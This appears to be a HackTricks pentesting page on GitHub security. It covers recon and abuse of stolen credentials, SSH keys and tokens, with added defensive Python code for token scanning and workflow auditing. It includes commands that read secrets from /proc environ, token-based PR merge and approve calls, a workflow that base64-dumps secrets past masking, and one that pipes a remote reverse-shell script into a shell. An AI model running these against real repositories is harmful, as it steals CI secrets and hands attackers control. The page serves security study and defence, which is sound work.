hacktricks/cloud-security/github-security
2021-12-02 12:01:09 +00:00

Github Security

What is Github

(From here) At a high level, GitHub is a website and cloud-based service that helps developers store and manage their code, as well as track and control changes to their code.

Basic Information

{% content-ref url="basic-github-information.md" %} basic-github-information.md {% endcontent-ref %}

External Recon

Github repositories can be configured as public, private or internal.

  • Private means that only members of the organisation will be able to access them.
  • Internal means that only members of the enterprise (an enterprise may have several organisations) will be able to access them.
  • Public means that anyone on the internet will be able to access them.

If you know the user, repo or organisation you want to target, you can use github dorks to find sensitive information, or search for sensitive information leaks in each repo.

Github Dorks

Github lets you search for a string while restricting the scope to a user, a repo or an organisation. Therefore, with a list of strings that usually appear close to sensitive information, you can easily search for potential sensitive information in your target.

Tools (each tool contains its list of dorks):

Github Leaks

Please note that github dorks are also meant to search for leaks, using github search options. This section is dedicated to tools that download each repo and search for sensitive information in them (even checking a certain depth of commit history).

Tools (each tool contains its list of regexes):

Internal Recon

With User Credentials

If you somehow already have credentials for a user inside an organization, you can just log in and check which enterprise and organization roles you have. If you are a raw member, check which permissions raw members have, which groups you are in, which permissions you have over which repos, and how the repos are protected.

Note that 2FA may be in use, so you will only be able to access this information if you can also pass that check.

{% hint style="info" %} Note that if you manage to steal the user_session cookie (currently configured with SameSite: Lax) you can completely impersonate the user without needing credentials or 2FA. {% endhint %}

With User SSH Key

Github allows users to set SSH keys that will be used as the authentication method to deploy code on their behalf (no 2FA is applied).

With this key you can perform changes in repositories where the user has some privileges; however, you cannot use it to access the github API to enumerate the environment. You can, however, enumerate the local git settings to get information about the repos and the user you have access to:

# Go to the repository folder
# Get repo config and current user name and email
git config --list

If the user has configured their git username as their github username, you can access the public keys set in their account at https://github.com/<github_username>.keys; you can check this to confirm that the private key you found can be used.

SSH keys can also be set in repositories as deploy keys. Anyone with access to such a key will be able to launch projects from a repository. Usually, on a server with several deploy keys, the local file ~/.ssh/config will tell you which key is related to which repository.

GPG Keys

As explained here, sometimes commits need to be signed or you might get discovered.

Check locally if the current user has any key with:

gpg --list-secret-keys --keyid-format=long

With User Token

For an introduction about User Tokens check the basic information.

A user token can be used instead of a password for Git over HTTPS, or can be used to authenticate to the API over Basic Authentication. Depending on the privileges attached to it you might be able to perform different actions.

A User token looks like this: ghp_EfHnQFcFHX6fGIu5mpduvRiYR584kK0dX123

With Oauth Application

With Github Application

With Malicious Github Action

For an introduction about Github Actions check the basic information.

In case you can execute arbitrary github actions in a repository, you can steal the secrets from that repo.

In case members of an organization can create new repos and you can execute github actions, you can create a new repo and steal the secrets set at organization level.

In case you somehow managed to infiltrate a Github Action, if you can escalate privileges you can steal secrets from the processes in which the secrets have been set as environment variables. In some cases you don't even need to escalate privileges.

cat /proc/<proc_number>/environ
cat /proc/*/environ | grep -i secret # Supposing the env variable name contains "secret"

GITHUB_TOKEN

This "secret" (coming from ${{ secrets.GITHUB_TOKEN }} and ${{ github.token }}) is widely used to give the Action (mostly read) access to the repo. This token is the same one a Github Application would use, so it can access the same endpoints: https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps

You can see the possible permissions of this token in: https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token

These tokens look like this: ghs_veaxARUji7EXszBMbhkr4Nz2dYz0sqkeiur7

Some interesting things you can do with this token:

# Merge PR
curl -X PUT \
    https://api.github.com/repos/<org_name>/<repo_name>/pulls/<pr_number>/merge \
    -H "Accept: application/vnd.github.v3+json" \
    -H "Authorization: Bearer $GITHUB_TOKEN" \
    -H "Content-Type: application/json" \
    -d '{"commit_title":"commit_title"}'

# Approve a PR
curl -X POST \
    https://api.github.com/repos/<org_name>/<repo_name>/pulls/<pr_number>/reviews \
    -H "Accept: application/vnd.github.v3+json" \
    -H "Authorization: Bearer $GITHUB_TOKEN" \
    -H "Content-Type: application/json" \
    -d '{"event":"APPROVE"}'

{% hint style="danger" %} Note that on several occasions you will be able to find github user tokens inside Github Actions envs or in the secrets. These tokens may give you more privileges over the repository and organization. {% endhint %}
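Detection for the token formats shown in this section (ghp_ user tokens and ghs_ GITHUB_TOKEN values), as an added example that is not HackTricks' code: the kind of regex pass the leak-scanning tools above run over cloned repositories and Actions logs. The sample input is constructed and reuses the two example token strings from this page; the prefix-to-kind mapping is GitHub's 2021 token format.

```python
import re
from typing import List, NamedTuple

# Token prefixes GitHub introduced in 2021; 36 alphanumeric characters follow the prefix.
TOKEN_KINDS = {
    "ghp": "personal access token",
    "ghs": "server-to-server token (Actions GITHUB_TOKEN, App installation)",
    "gho": "OAuth access token",
    "ghu": "user-to-server token (GitHub App)",
    "ghr": "refresh token",
}
TOKEN_RE = re.compile(r"\b(gh[pousr])_[A-Za-z0-9]{36}\b")

class Finding(NamedTuple):
    line_no: int
    kind: str
    redacted: str

def redact(token: str) -> str:
    # Keep the prefix and the last 4 characters: enough to triage, not enough to reuse.
    return token[:4] + "*" * (len(token) - 8) + token[-4:]

def scan_text(text: str) -> List[Finding]:
    """Report every GitHub token pattern in `text`, one redacted Finding per match."""
    return [
        Finding(no, TOKEN_KINDS[m.group(1)], redact(m.group(0)))
        for no, line in enumerate(text.splitlines(), 1)
        for m in TOKEN_RE.finditer(line)
    ]

# Constructed sample: a committed .env file plus an Actions log line. The two token
# values are the example strings shown on this page, not live credentials.
SAMPLE = """DB_PASSWORD=hunter2
GITHUB_PAT=ghp_EfHnQFcFHX6fGIu5mpduvRiYR584kK0dX123
# looks like a token but is too short: ghp_tooshort
2021-12-02T12:01:09Z env: GITHUB_TOKEN=ghs_veaxARUji7EXszBMbhkr4Nz2dYz0sqkeiur7
"""

if __name__ == "__main__":
    for f in scan_text(SAMPLE):
        print(f"line {f.line_no}: {f.kind}: {f.redacted}")
```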

List secrets in Github Action output

name: list_env
on:
  workflow_dispatch:
jobs:
  List_env:
    runs-on: ubuntu-latest
    steps:
      - name: List Env
        # Need to base64 encode or github will change the secret value for "***"
        run: sh -c 'env | grep "secret_" | base64 -w0'
        env:
          secret_mysql_pass: ${{secrets.MYSQL_PASSWORD}}
          secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORD}}

Get reverse shell with secrets

name: revshell
on:
  workflow_dispatch:
jobs:
  create_pull_request:
    runs-on: ubuntu-latest
    steps:
      - name: Get Rev Shell
        run: sh -c 'curl https://reverse-shell.sh/2.tcp.ngrok.io:15217 | sh'
        env:
          secret_mysql_pass: ${{secrets.MYSQL_PASSWORD}}
          secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORD}}
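An added example (not code from HackTricks) showing how a repository owner can catch the two workflow patterns above at review time: a line-based audit that flags steps which both receive secrets and run env-dumping, base64 or curl-into-shell commands, and reports a missing top-level permissions: block for GITHUB_TOKEN. The two workflows are constructed, one mirroring list_env and one hardened; the helper names are this example's own.

```python
import re
# Commands a reviewer would flag inside a `run:` step; each appears in the workflows above.
RUN_PATTERNS = [
    (re.compile(r"\benv\b\s*\|"), "dumps the whole environment"),
    (re.compile(r"\bbase64\b"), "encodes output, which defeats the *** secret masking"),
    (re.compile(r"\bcurl\b.*\|\s*(ba)?sh\b"), "pipes a remote script into a shell"),
]
SECRET_REF = re.compile(r"\$\{\{\s*secrets\.")
STEP_START = re.compile(r"^\s*-\s")  # a YAML list item: under steps:, a new step
RUN_LINE = re.compile(r"^\s*(-\s*)?run:\s*(.*)")

def audit_workflow(text: str) -> list:
    # Line-based (no YAML parser needed): report a missing top-level permissions
    # block and every step that both receives secrets and runs a leak-capable command.
    lines = text.splitlines()
    findings = [] if any(l.startswith("permissions:") for l in lines) else [
        "no top-level permissions: block, so GITHUB_TOKEN keeps the default scope"]
    steps = []  # list items outside steps: stay empty and are never reported
    for no, line in enumerate(lines, 1):
        if STEP_START.match(line):
            steps.append({"line": no, "reasons": [], "secrets": 0})
        run = RUN_LINE.match(line)
        if steps and run:
            steps[-1]["reasons"] += [why for pat, why in RUN_PATTERNS if pat.search(run.group(2))]
        if steps and SECRET_REF.search(line):
            steps[-1]["secrets"] += 1
    findings += [f"step at line {s['line']}: {s['secrets']} secret(s) exposed to a run that "
                 + "; ".join(s["reasons"]) for s in steps if s["secrets"] and s["reasons"]]
    return findings

# Constructed workflows: LEAKY mirrors the list_env example above; HARDENED is the fixed form.
LEAKY = """on: workflow_dispatch
jobs:
  list_env:
    runs-on: ubuntu-latest
    steps:
      - run: sh -c 'env | grep "secret_" | base64 -w0'
        env:
          secret_mysql_pass: ${{ secrets.MYSQL_PASSWORD }}
"""
HARDENED = """on: workflow_dispatch
permissions:
  contents: read
jobs:
  deploy:
    runs-on: ubuntu-latest
    steps:
      - run: ./deploy.sh  # reads DB_PASSWORD from its own environment, prints nothing
        env:
          DB_PASSWORD: ${{ secrets.MYSQL_PASSWORD }}
"""
```

Running audit_workflow over both constants reports two findings for LEAKY and none for HARDENED; the same check applied to the revshell workflow above trips the curl-into-shell pattern.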

Bypassing Branch Protection